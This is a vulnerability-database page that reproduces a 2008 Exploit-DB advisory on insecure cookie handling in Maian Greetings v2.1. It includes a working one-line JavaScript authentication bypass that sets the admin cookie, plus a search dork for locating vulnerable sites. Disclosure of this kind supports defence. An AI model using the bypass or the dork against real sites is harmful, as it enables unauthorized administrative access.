header-logo
Suggest Exploit
vendor:
Maian Greetings
by:
Saime
7.5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: Maian Greetings
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:maianscriptworld:maian_greetings:2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Maian Greetings v2.1 Insecure Cookie Handling Vulnerability

Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie, equals admin username. The exploit is a javascript code that sets the cookie mecard_admin_cookie to admin.

Mitigation:

Ensure that the application is validating the cookie values and not just relying on the cookie name.
Source

Exploit-DB raw data:

Author: Saime
Date: July 12, 2008
Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Powered by: Maian Greetings v2.1

Description:
Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie,
equals admin username.

Exploit:
javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"

# milw0rm.com [2008-07-12]

Navigation

Suggest Exploit

Services By CQR